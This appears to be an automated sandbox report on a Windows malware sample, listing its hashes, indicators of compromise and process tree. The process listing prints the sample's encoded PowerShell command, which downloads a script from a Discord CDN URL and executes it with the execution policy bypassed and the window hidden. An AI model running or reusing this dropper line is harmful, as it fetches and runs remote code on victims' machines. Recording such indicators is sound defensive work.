03ac65cbbc897a705cfa15c74bba1adc773f88db724398db12d105d19ee8ee50

Analysis

max time kernel
31s
max time network
33s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
28-03-2023 12:12

Target

tmp.exe
Size

92KB
MD5

f0b2f2d5186ecb1df278892375e29171
SHA1

f1e2e1365ad3463a5685bd6ab8eeb581f50dd0ee
SHA256

03ac65cbbc897a705cfa15c74bba1adc773f88db724398db12d105d19ee8ee50
SHA512

41fa116f39afd6f4e7fc7bad821c0ce9fe0db268dab18a9e83db6ec3fe6c83099bf14f80441f0bf87a4d5590782a1ba9908d6c576d8c56e224a8c096aae07c0d
SSDEEP

1536:EjpxRYrm0MlPJFZyMzJdNHJGQ/l3pS+2ZyxDG/ONJctGVaIsWkBcd5ApB:EjF0M9bldNrpS+2ZyxDG//UVb58B

Score

10^/10

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cdn.discordapp.com/attachments/1089906964944920650/1090020680885600276/6456234.ps1

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

4 1684 powershell.exe
5 1684 powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1684 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1684 powershell.exe

flow	pid	process
4	1684	powershell.exe
5	1684	powershell.exe

pid	process
1684	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1684	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

tmp.execmd.exe

description	pid	process	target process
PID 1964 wrote to memory of 1936	1964	tmp.exe	cmd.exe
PID 1964 wrote to memory of 1936	1964	tmp.exe	cmd.exe
PID 1964 wrote to memory of 1936	1964	tmp.exe	cmd.exe
PID 1964 wrote to memory of 1936	1964	tmp.exe	cmd.exe
PID 1936 wrote to memory of 1684	1936	cmd.exe	powershell.exe
PID 1936 wrote to memory of 1684	1936	cmd.exe	powershell.exe
PID 1936 wrote to memory of 1684	1936	cmd.exe	powershell.exe
PID 1936 wrote to memory of 1684	1936	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADgAOQA5ADAANgA5ADYANAA5ADQANAA5ADIAMAA2ADUAMAAvADEAMAA5ADAAMAAyADAANgA4ADAAOAA4ADUANgAwADAAMgA3ADYALwA2ADQANQA2ADIAMwA0AC4AcABzADEAJwApAA==
2⤵
- Suspicious use of WriteProcessMemory
PID:1936

memory/1684-56-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/1684-57-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/1684-58-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download